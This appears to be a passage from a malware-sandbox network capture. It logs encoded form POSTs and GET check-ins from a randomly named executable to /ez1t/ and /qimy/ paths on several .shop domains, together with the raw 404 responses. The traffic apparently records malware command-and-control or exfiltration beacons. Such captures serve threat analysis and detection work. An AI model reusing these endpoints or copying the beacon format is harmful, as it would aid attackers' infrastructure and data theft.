                                                                            Data Ascii: BHptZ6F=3ds4vL+R3/6ZZzh8gWx/K4qN/p9L9B6HC7S5gKtV5kVXf28L/qGOU7PAHS29GMx6XygdCKNM5a045OFzPv6OGixjbffQYSApzHjgNQY4WpNLRtUZd/j+AYp0Ts9i6kDRiLodMqfZ6L5pV6J/CpZE4TcSlyQ92xGsSOLjmfev9FDSDZ7YaGLhyAsQt6MJtwfHx9GQkC2GFd14b5U7dkUhLxY=
                                                                            Dec 6, 2024 17:38:51.231123924 CET | 910 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:38:51 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Powered-By: PHP/7.4.33
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ncRbJFQ0QFw%2BWH%2BDc0YIPq1OEGnzWQe%2BG%2BfsfdF57MPZpn6DMs81OjFhSkXissxUlPxwmIZIq%2FHuwb%2BQ9vyeVe4PTmssyDbl49YxPRY9Z2wb0PTfNw4uMpv6BA%2FBGVsr%2BBalXs7PsfY%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8eddb5689e41f78f-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1659&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=813&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 190


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            39 | 192.168.2.12 | 50016 | 104.21.90.137 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 6, 2024 17:38:52.727773905 CET | 1826 | OUT | POST /ez1t/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.ana-silverco.shop
                                                                            Origin: http://www.ana-silverco.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.ana-silverco.shop/ez1t/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 33 64 73 34 76 4c 2b 52 33 2f 36 5a 5a 7a 68 38 67 57 78 2f 4b 34 71 4e 2f 70 39 4c 39 42 36 48 43 37 53 35 67 4b 74 56 35 6b 64 58 66 46 45 4c 2b 4c 47 4f 56 37 50 41 4a 79 32 2b 47 4d 78 6a 58 79 4a 55 43 4b 51 35 35 5a 41 34 2f 63 4e 7a 4a 65 36 4f 4d 69 78 6a 45 50 66 56 58 79 41 47 7a 42 44 73 4e 51 6f 34 57 70 4e 4c 52 76 38 5a 55 4c 33 2b 43 59 70 33 45 63 39 55 78 45 44 35 69 4c 78 71 4d 71 61 73 6d 72 5a 70 56 61 5a 2f 41 61 68 45 77 54 63 51 31 69 51 6c 32 32 50 73 53 50 69 53 6d 63 44 41 39 43 50 53 41 38 57 79 45 57 50 46 6e 6a 78 6f 68 35 41 33 68 79 48 73 79 4c 6d 48 71 78 43 30 4f 4f 35 6f 63 6f 34 30 59 33 38 33 64 68 76 69 66 52 30 67 74 2b 2b 2b 6f 6b 56 75 47 6d 50 50 57 7a 46 68 51 6b 6d 39 79 6e 6c 63 2f 4c 34 47 72 56 7a 35 6b 32 53 39 31 56 50 32 4a 4e 78 58 65 30 45 66 4f 4e 7a 4a 5a 6a 61 6d 32 6c 4a 32 34 5a 43 45 4a 78 56 52 78 65 4f 36 56 50 49 45 74 50 73 41 6b 71 75 77 4d 66 53 66 38 52 6c 74 71 2b 44 36 79 7a 55 65 51 4f 79 51 2b 61 54 39 74 4f [TRUNCATED]
                                                                            Data Ascii: BHptZ6F=3ds4vL+R3/6ZZzh8gWx/K4qN/p9L9B6HC7S5gKtV5kdXfFEL+LGOV7PAJy2+GMxjXyJUCKQ55ZA4/cNzJe6OMixjEPfVXyAGzBDsNQo4WpNLRv8ZUL3+CYp3Ec9UxED5iLxqMqasmrZpVaZ/AahEwTcQ1iQl22PsSPiSmcDA9CPSA8WyEWPFnjxoh5A3hyHsyLmHqxC0OO5oco40Y383dhvifR0gt+++okVuGmPPWzFhQkm9ynlc/L4GrVz5k2S91VP2JNxXe0EfONzJZjam2lJ24ZCEJxVRxeO6VPIEtPsAkquwMfSf8Rltq+D6yzUeQOyQ+aT9tO5XY6BucOqkfBJFuM12Yj4xJb8+XQITJ95I+ZuT5EwlYRGHiPVVlxPhLvhyZ/SaSGUXZHpVoTw6YJcg5SaeSAfQF8//XLldhjmisi2XOFYD1/4mmkOSq36k0NfM8JBlpR4r61fCc5cPVDt/gtjCMQbbq63eDckVN2yOH2ltvGv6fDVdwAn+JWw/+VhqLhg3ofIiOvtI2Uwp1tlJSoHrUjTTKDaoyFU/SEhBLyfs4ptJwC2ivU+2VmoAogZNipWdTkFbO4BJdd5nXSvZaF81DkCyEOkvscYHkyBoY6/oUjm5Oit30qhPMU39y+YGyDhC79fNJIVNUbyFLcUvU9e4fu1CLZT53G2YJWqRcNt92c7wYu/axdLsgX4AilPWYU8DQnV9RVzVkbYZ9QaJ5KOkiXUPWEJv6I2MH7oE5XVJf1T+5DF9Vl4Uj7TVCbetLTvgoznNe+9Zc4zJ98qlHPydyGIBybwRI7IggBYuvt55d3HIz3162zW84WQpubrfsxA4QVgDskWVO7ekMes6CkU9mvKftvaVk+depKibEy2AsgT7Xe5MdQUrc83FfA9vdXaRZlJXQ8j/cL2kUcyUlyLtDtr9fNCKJeeBVWLn5ByLBvqL4zE1ENQn6gr4vt409wh5o6k0987sXI/IOUEhKduZXlcLYLVwaNeSb2N1 [TRUNCATED]
                                                                            Dec 6, 2024 17:38:53.955550909 CET | 909 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:38:53 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Powered-By: PHP/7.4.33
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=klTNJjBKBRcyfJIazy2jYLVA0hRfmQr4XFeXLNL%2FP2eSQRU9lEJID8mbAMkExn3sZ71P%2FfDl3RsR1bjUcyxVKV%2FniUxWWLu5KGQBt5ae4r3V73kgWWqi1ml%2BOGhqUJNQB3oX9zj4a%2F4%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8eddb5798d5fef9f-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=29696&min_rtt=29696&rtt_var=14848&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1826&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 190


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            40 | 192.168.2.12 | 50021 | 104.21.90.137 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 6, 2024 17:38:55.392103910 CET | 519 | OUT | GET /ez1t/?BHptZ6F=6fEYs/GnwtqWMztB9xFdTpyVwIgq4y66Lrjdt5EE8ztyQFcx1ZWnbcrnPkjaT/5aXxdNApMw2aINlctYTPbgIAplS4neSxI29SjRMg4iVPNQf+tma6zkIeo=&RZ=0nkpmZbx9Z4P2 HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.ana-silverco.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:38:56.544302940 CET | 847 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:38:56 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Powered-By: PHP/7.4.33
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xUKvpOayw%2FbaN0zwn70sunYJryCSswQyyAn3CKPqEpaf3Tjq7Iupbufkoy1HRwY8rJM60Vi4bseWikiCm6QPe1uPnUS0QDp0pR0uo%2BiZsXAgHAzolQ%2FlbCHY50gpkaRj1YnVU%2BjYoKk%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8eddb589f82842da-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=519&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            41 | 192.168.2.12 | 50022 | 108.179.253.197 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 6, 2024 17:39:02.526726007 CET | 805 | OUT | POST /qimy/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.bloodbalancecaps.shop
                                                                            Origin: http://www.bloodbalancecaps.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.bloodbalancecaps.shop/qimy/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 6b 55 63 78 50 36 38 61 35 31 54 6e 4d 74 54 67 52 52 34 31 4b 49 4c 42 62 64 38 57 55 49 4c 4f 74 6a 4e 2b 4d 55 78 39 70 52 57 58 4e 37 4e 31 69 68 62 4b 50 34 59 6c 77 31 62 2b 35 43 44 34 79 64 49 46 62 4b 49 70 50 33 49 61 46 68 63 72 69 54 4f 4d 69 63 5a 4e 68 39 77 6d 65 36 67 65 59 4c 78 76 75 5a 42 6e 71 6b 4a 77 57 73 79 58 76 48 41 6b 44 6c 72 50 39 77 4a 62 54 36 4c 6c 31 39 4f 2f 71 70 4a 52 53 43 6d 6a 38 37 31 34 70 67 34 71 4c 64 72 6c 47 54 2f 51 35 66 7a 71 42 70 4b 51 43 70 35 41 4e 52 73 30 38 6b 47 39 33 6a 38 67 57 4b 47 55 6e 51 32 53 69 48 35 49 39 41 3d 3d
                                                                            Data Ascii: BHptZ6F=kUcxP68a51TnMtTgRR41KILBbd8WUILOtjN+MUx9pRWXN7N1ihbKP4Ylw1b+5CD4ydIFbKIpP3IaFhcriTOMicZNh9wme6geYLxvuZBnqkJwWsyXvHAkDlrP9wJbT6Ll19O/qpJRSCmj8714pg4qLdrlGT/Q5fzqBpKQCp5ANRs08kG93j8gWKGUnQ2SiH5I9A==
                                                                            Dec 6, 2024 17:39:03.765054941 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:39:03 GMT
                                                                            Server: Apache
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            X-Endurance-Cache-Level: 2
                                                                            X-nginx-cache: WordPress
                                                                            Content-Length: 15183
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 [TRUNCATED]
                                                                            Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ 1s#N"h&\r&d&g\@Ys9=K\_0yE[%>7f`Um*Vf\R.4<IoT<t+tlcKdR,b7FpyG4y$sirB(`(s!M*/'6% v,Jv1^BjLUFjmn1fvDfUseN#l1=qY,L}?\&L0/5YGnik[:^gKh7b}'i2<,,O]:h?Pl_KwCQDSZq`~?=\vzYsi4q!C&ob4Qm*N&V;;Y"?XM3:S&!nA(Xnq}<7mkn7G6w&#n^SIj[Ot5p,I&rg@w"Ll
                                                                            Dec 6, 2024 17:39:03.765098095 CET | 1236 | IN | Data Raw: b5 f5 a4 f9 09 9c 64 c9 a9 fd 5a 6c 5a 63 0d b6 d0 92 d8 0e a0 09 e6 cd f5 5e 51 be d6 62 79 09 93 c9 44 ff 6c 7f 7d 68 6d 04 2e 56 02 9b 19 77 f2 63 76 88 8e 6a c4 82 25 0d 7f 59 e8 60 1a bf 14 d1 d5 20 c4 67 1c 0f 7e 29 62 f0 e2 5f 8a be e7 45
                                                                            Data Ascii: dZlZc^QbyDl}hm.Vwcvj%Y` g~)b_E`Uq0-Ikml<h_U [/xl`3:3_M2\JEF"4n@>&\Zb~5WDm>eI\Bx;TLY; T/pi,am
                                                                            Dec 6, 2024 17:39:03.765111923 CET | 1236 | IN | Data Raw: 25 fe 0c 5b 40 f3 80 30 e5 2a a9 56 85 8c 20 6a ed b1 bb c6 0f 6a e2 56 ef d2 8e 6c de 72 8b 30 c7 56 5f 66 d4 ef 7e 7f fa 32 75 c5 9b b5 16 a1 12 4a af a4 1a c7 4a 5a 1a b3 8c 8b f9 6e cc ed 76 2f e2 d8 ee 86 66 d5 1e 57 31 81 fe 46 12 26 67 a1
                                                                            Data Ascii: %[@0*V jjVlr0V_f~2uJJZnv/fW1F&goyj+ TYzuIP0ML*\J5t$5d;'X,AKpc1lrny\(mGqwL7V`1,KJFXA#!,93EX=X
                                                                            Dec 6, 2024 17:39:03.765125036 CET | 1236 | IN | Data Raw: 9f 98 69 b2 58 66 55 fb 18 67 d8 7a 19 e9 0f b1 b9 7b 9f f1 c8 a6 d5 6b 75 5c e6 c6 5c 08 3f 2c b4 06 69 df b9 7d 8c d7 12 95 62 fa a5 ae 81 c2 56 eb 05 1f a2 d2 5a 04 38 26 68 bf 97 df 13 a3 04 8f c8 67 61 18 8e 57 76 b9 c0 b0 53 a3 66 16 2e 0d
                                                                            Data Ascii: iXfUgz{ku\\?,i}bVZ8&hgaWvSf.4strM.gUA~9Y>,8e^4! Ih5{5{7]-lKFW"\JM#f+}\i}DTI1']XR5nCoMr/3Q X]M'4UtE
                                                                            Dec 6, 2024 17:39:03.765223980 CET | 1236 | IN | Data Raw: e9 64 71 f6 e6 4d c4 4d 2e d8 dc 27 55 11 79 cb b3 5c 69 cb a4 1d e3 6d 80 56 00 ed 13 a9 6a ae 70 d3 29 8b d0 68 75 d7 29 f0 24 b5 3e e9 a1 57 77 6f aa 69 6a 2e 32 a6 13 2e 7d e2 11 af e3 5d 3e ba 5e 89 53 49 e3 13 ea 75 1e 63 04 2c bc 4b b4 2a
                                                                            Data Ascii: dqMM.'Uy\imVjp)hu)$>Wwoij.2.}]>^SIuc,K*dT*gQez\fz+J1Egwl\MNkvPVhEzO&v~<bWO&{0N,BX}Qg2td>~2s\Ln@h=!
                                                                            Dec 6, 2024 17:39:03.765295982 CET | 1236 | IN | Data Raw: f9 5b c1 34 f8 a4 37 3e 96 35 a4 03 9f 0c bb 83 a3 49 03 3a f4 c9 a0 3b 7c 22 a9 ef 92 fa 47 93 fa ae 5d ff 89 76 bd 0b 7a 8d bc 2f ba d7 47 d3 ae 31 d1 27 d7 dd de c5 5e 5a a8 84 42 9d 03 c1 c2 3b 9f 7c e6 95 9f fa 9c 70 ce 70 2b a2 e0 26 a5 89
                                                                            Data Ascii: [47>5I:;|"G]vz/G1'^ZB;|pp+&fsLgAp\RnQS34/"vY7SQqP't*@i&jXv%ap'E*~Da0:~'"j#v 1lzvReKF=80cL;|tV3c1W~
                                                                            Dec 6, 2024 17:39:03.765342951 CET | 1236 | IN | Data Raw: c4 ec 41 67 70 85 99 87 52 ae 30 65 d4 f1 2e 8e a4 f4 30 a5 57 73 9f b2 48 cd 28 95 cc 16 9a 09 9f 5c e4 f7 e5 f7 1a bf 3a 09 58 d3 6b 93 e5 7f a7 ff 88 e3 b2 3a 02 c8 11 be 8f 35 e5 63 e4 d5 54 0f 0f 55 e3 af ce 37 9d eb 6a 0f 76 56 85 15 5c 42
                                                                            Data Ascii: AgpR0e.0WsH(\:Xk:5cTU7jvV\B[N+hnX?z:qGPPssV>Z)K0v.DDP@}&x^fydL'\BnBwosEnV!)6#iVeOUi-<efE|yE@$OY[$OCnI
                                                                            Dec 6, 2024 17:39:03.765357018 CET | 1000 | IN | Data Raw: 6e 93 63 45 c4 15 89 79 52 73 07 59 00 d1 81 bb 84 09 01 7a 7e e0 96 67 2c 81 03 77 96 05 e2 d0 dd 94 47 b0 cd a6 b5 78 8e 0f 62 3c d3 98 65 5c cc eb 2a b6 ae 51 2a 15 cd 97 15 86 7f 04 9f 78 9d 2b 0d d9 f8 a1 93 32 83 6c 70 3d 55 8b 27 19 94 b9
                                                                            Data Ascii: ncEyRsYz~g,wGxb<e\*Q*x+2lp=U'-gILeMJ' RnD2#gh<g_57!:k_%KU@f29u{0~YORBOD+;9bS%-:{UqByUIbH.B_*i53DU1S
                                                                            Dec 6, 2024 17:39:03.765451908 CET1236INData Raw: 3a 3d ae 8e f5 b8 7e 9d 1e d7 c7 7a f4 bc d7 69 d2 f3 8e 76 e9 bd 52 97 de d1 2e fd 57 ea d2 af e9 62 32 26 04 8d 15 de 1b fe 11 16 eb 53 1d e8 fa 92 56 75 35 78 19 44 bc c8 5e 00 58 15 d6 20 0a a6 13 78 01 60 59 57 83 77 ff 62 c4 fb c3 98 9f 00
                                                                            Data Ascii: :=~zivR.Wb2&SVu5xD^X x`YWwbz5PJY|u>Z]3tL^sXayt{F{44;Xj0*G6x1v.7JJYVP<a+''TeZDm- T,T
                                                                            Dec 6, 2024 17:39:03.765642881 CET1236INData Raw: 76 d2 f8 67 74 d5 9f 35 18 43 2e 3a 97 9d 5e 55 b3 61 e9 68 01 b5 aa 08 53 ca b1 a8 41 dc 1e cd a4 71 e1 dd 5f 78 2b 56 6e c6 25 62 b7 c8 85 62 91 e9 c6 81 8e 93 ee 7e 7d 27 97 49 63 a7 43 85 5a 89 c0 33 96 40 d7 a5 ac da 0c fa f7 83 fe d3 6d 62
                                                                            Data Ascii: vgt5C.:^UahSAq_x+Vn%bb~}'IcCZ3@mb6u8Ln}e<c2Bgb-~Lss)!3Mng `hmmXXrZ|4v-w>harTftUA2>4noLyn&QIn"gi
                                                                            Dec 6, 2024 17:39:03.885915995 CET1236INData Raw: ef 35 98 1c 0d c9 a7 68 1a 0b 99 59 11 81 88 6a 9e a4 76 03 89 75 3c 29 e9 39 66 a9 d2 fc a3 a3 23 0e 4f 51 01 3c 39 c6 06 b8 5e fc da fb 72 20 c2 34 67 18 09 40 4c 1a 0d 82 e3 91 88 59 46 b1 94 23 21 cd 42 8b 83 4d 1a ae 4d 77 03 d3 58 67 95 bc
                                                                            Data Ascii: 5hYjvu<)9f#OQ<9^r 4g@LYF#!BMMwXg|PSC~v#uXY=vC_4|eAa?:'E-*Z2E^FP|_kGvf[B+ydf.CJA''Vv\#|W*_E`TLF\


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            42 | 192.168.2.12 | 50023 | 108.179.253.197 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 6, 2024 17:39:05.198966026 CET | 825 | OUT | POST /qimy/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.bloodbalancecaps.shop
                                                                            Origin: http://www.bloodbalancecaps.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.bloodbalancecaps.shop/qimy/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 6b 55 63 78 50 36 38 61 35 31 54 6e 4d 4e 6a 67 4b 79 67 31 4d 6f 4c 43 48 4e 38 57 4e 59 4c 4b 74 6a 42 2b 4d 57 63 6c 6f 6a 79 58 4d 66 64 31 6a 67 62 4b 63 49 59 6c 6c 46 62 6e 6b 53 43 36 79 64 45 37 62 50 49 70 50 33 63 61 46 67 73 72 2b 77 6e 2b 6a 4d 5a 50 74 64 78 41 42 71 67 65 59 4c 78 76 75 5a 46 4a 71 67 6c 77 57 63 43 58 39 57 41 6e 64 56 72 4d 36 77 4a 62 58 36 4c 70 31 39 4f 4e 71 6f 56 72 53 48 69 6a 38 35 39 34 70 78 34 31 41 64 72 6a 4a 7a 2b 45 30 38 76 75 41 34 4c 46 5a 4c 6f 6b 46 77 63 6e 30 43 4c 6e 6f 52 30 32 44 4a 53 5a 71 48 50 69 76 45 45 42 6d 4b 37 36 71 67 44 7a 6c 63 64 71 63 79 30 74 6d 47 50 39 6a 65 38 3d
                                                                            Data Ascii: BHptZ6F=kUcxP68a51TnMNjgKyg1MoLCHN8WNYLKtjB+MWclojyXMfd1jgbKcIYllFbnkSC6ydE7bPIpP3caFgsr+wn+jMZPtdxABqgeYLxvuZFJqglwWcCX9WAndVrM6wJbX6Lp19ONqoVrSHij8594px41AdrjJz+E08vuA4LFZLokFwcn0CLnoR02DJSZqHPivEEBmK76qgDzlcdqcy0tmGP9je8=
                                                                            Dec 6, 2024 17:39:06.469746113 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:39:06 GMT
                                                                            Server: Apache
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            X-Endurance-Cache-Level: 2
                                                                            X-nginx-cache: WordPress
                                                                            Content-Length: 15183
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 [TRUNCATED]
                                                                            Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ 1s#N"h&\r&d&g\@Ys9=K\_0yE[%>7f`Um*Vf\R.4<IoT<t+tlcKdR,b7FpyG4y$sirB(`(s!M*/'6% v,Jv1^BjLUFjmn1fvDfUseN#l1=qY,L}?\&L0/5YGnik[:^gKh7b}'i2<,,O]:h?Pl_KwCQDSZq`~?=\vzYsi4q!C&ob4Qm*N&V;;Y"?XM3:S&!nA(Xnq}<7mkn7G6w&#n^SIj[Ot5p,I&rg@w"Ll
                                                                            Dec 6, 2024 17:39:06.469810009 CET | 1236 | IN | Data Raw: b5 f5 a4 f9 09 9c 64 c9 a9 fd 5a 6c 5a 63 0d b6 d0 92 d8 0e a0 09 e6 cd f5 5e 51 be d6 62 79 09 93 c9 44 ff 6c 7f 7d 68 6d 04 2e 56 02 9b 19 77 f2 63 76 88 8e 6a c4 82 25 0d 7f 59 e8 60 1a bf 14 d1 d5 20 c4 67 1c 0f 7e 29 62 f0 e2 5f 8a be e7 45
                                                                            Data Ascii: dZlZc^QbyDl}hm.Vwcvj%Y` g~)b_E`Uq0-Ikml<h_U [/xl`3:3_M2\JEF"4n@>&\Zb~5WDm>eI\Bx;TLY; T/pi,am
